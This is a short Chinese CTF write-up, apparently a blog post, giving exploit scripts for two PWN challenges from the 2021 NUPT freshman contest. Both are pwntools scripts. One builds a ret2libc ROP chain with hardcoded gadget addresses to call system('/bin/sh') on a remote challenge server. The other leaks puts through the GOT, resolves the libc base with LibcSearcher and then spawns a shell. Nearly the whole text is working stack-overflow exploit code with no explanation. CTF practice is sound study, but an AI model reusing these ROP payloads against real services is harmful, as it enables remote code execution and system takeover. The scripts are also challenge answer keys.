南邮2021新生赛PWN部分
直接上exp了
Ret2Libc
from pwn import*
p = remote('121.4.15.155',10001)
#p = process('./ny_ret2libc')
pop_rdi_addr=0x401223
pop_rsi_addr=0x401221
bin_sh_addr=0x404040
system_addr=0x401040
payload2=b"B"*88+p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)
p.sendline(payload2)
p.interactive()
Ret2Lbic pro max
from LibcSearcher import *
from pwn import *
#context(os="linux", arch="amd64")
#context.log_level="debug"
local = 0
elf = ELF('./ny_ret2libc2')
ret_addr = 0x40101a
pop_rdi = 0x401223
if local:
pro = process('./ny_ret2libc2')
else:
pro = remote('121.4.15.155', 10004)
def get_libcbase():
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr = elf.sym['main']
payload=b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
pro.sendlineafter('funny\n',payload)
puts_addr= u64(pro.recv(6).ljust(8,b'\x00'))
# puts_addr = u64(pro.recv(8))
libc = LibcSearcher('puts',puts_addr)
libc_addr = puts_addr - libc.dump('puts')
print('________________',hex(libc_addr))
return libc,libc_addr
def get_shell(libc,libc_addr):
binsh=libc_addr+libc.dump('str_bin_sh')
system=libc_addr+libc.dump('system')
payload=b'a'*(0x50+8)+p64(pop_rdi)+p64(binsh)+p64(system)
pro.sendlineafter('funny\n',payload)
pro.interactive()
if __name__ == '__main__' :
libc ,libc_addr = get_libcbase()
get_shell(libc,libc_addr)
暂无评论